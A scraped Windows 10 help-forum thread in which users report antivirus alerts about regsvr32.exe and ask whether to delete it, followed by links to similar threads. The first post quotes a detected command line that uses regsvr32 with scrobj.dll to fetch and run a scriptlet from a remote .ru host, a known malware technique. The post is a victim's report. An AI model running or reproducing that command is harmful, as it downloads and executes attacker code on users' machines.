Windows 10: regsvr32.exe as Malware

Discus and support regsvr32.exe as Malware in Windows 10 BSOD Crashes and Debugging to solve the problem; Hello Team, We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u... Discussion in 'Windows 10 BSOD Crashes and Debugging' started by Sridhara Pavankumar, Nov 2, 2020.

1. regsvr32.exe as Malware

Hello Team,

We are observing Malware as Cloud IOC: W32.COMScriptletAbuse.ioc from the file path C:\Windows\System32\regsvr32.exe /s /n /u /i:http://server2.aserdefa.ru/restore.xml scrobj.dll. Can we delete or Uninstall the file will it affect the OS. Please let me know

:)

Sridhara Pavankumar, Nov 2, 2020
  2. nexor63 Win User

regsvr32.exe error

I constantly receive an antivirus regsvr32.exe malware threat

nexor63, Nov 2, 2020
  3. Jomel Ber Win User
    Jomel Ber, Nov 2, 2020
  4. TJMaxx Win User

regsvr32.exe as Malware

regsvr32.exe - application error

Very same issue, out of the blue. ran the sfc scannow as suggested with no integrity issues uncovered. Check for viruses malware etc. none found.

TJMaxx, Nov 2, 2020
Thema:

regsvr32.exe as Malware

1. regsvr32.exe as Malware - Similar Threads - regsvr32 exe Malware

2. RegSvr32 Error

in Windows 10 Gaming
    RegSvr32 Error: Hello,At somepoint today after I restarted my PC, I receive this Error. Prior to his I have to mention that I have Installed the latest Driver of my Nvidia Card. Thinking the install of the videocard might have caused this I re-installed it as well with no avail.To my...
  3. Regsvr32.exe class not registered

in Windows 10 Network and Sharing
    Regsvr32.exe class not registered: Hello, so today when i turn on my windows10 a pop up appear "C\windows\system32\regsvr32.execlass not registered" can someone explain why this is happening and how to fix it?...
  4. Regsvr32.exe class not registered

in Windows 10 Gaming
    Regsvr32.exe class not registered: Hello, so today when i turn on my windows10 a pop up appear "C\windows\system32\regsvr32.execlass not registered" can someone explain why this is happening and how to fix it?...
  5. Regsvr32.exe class not registered

in Windows 10 Software and Apps
  6. Regsvr32

in Windows 10 Customization
    Regsvr32: Hi dear friend Please help me soon. I am tired [ATTACH] [ATTACH] https://answers.microsoft.com/en-us/windows/forum/all/regsvr32/8d7e3119-89a2-477b-982a-a983140ec4f5
  7. Regsvr32

Regsvr32: Hi dear friend Please help me soon. I am tired [ATTACH] [ATTACH] https://answers.microsoft.com/en-us/windows/forum/all/regsvr32/e7e0a581-1778-461d-b3f2-7e8f96390057
  8. regsvr32

regsvr32: Hello there, my name Is Harry and I have recently encountered a problem with Windows 10. everytime I log-on, I have an error message that pops up which looks like this. [ATTACH] when I click the X in the top right corner or "Ok", it pops up again a few moments later...
  9. is Excelcnv exe malware?

in AntiVirus, Firewalls and System Security
    is Excelcnv exe malware?: I have problems with my PC performance. Today I found a program file called excelcnv. I think it is malware but I am not sure. Can I delete this file? c:/programfiles(X86)/microsoftoffice/root/office16 Thank you....
  10. unsual high cpu usage of regsvr32.exe

in Windows 10 BSOD Crashes and Debugging
    unsual high cpu usage of regsvr32.exe: hello everyone I'm having a bit of trouble with this application. Just recently my CPU has been mostly taken up by one instance of the above file continuously running. Now I have had a look in Task Manager and the following command lines are stated as below:-...

Users found this page by searching for:

1. server2.aserdefa.ru malware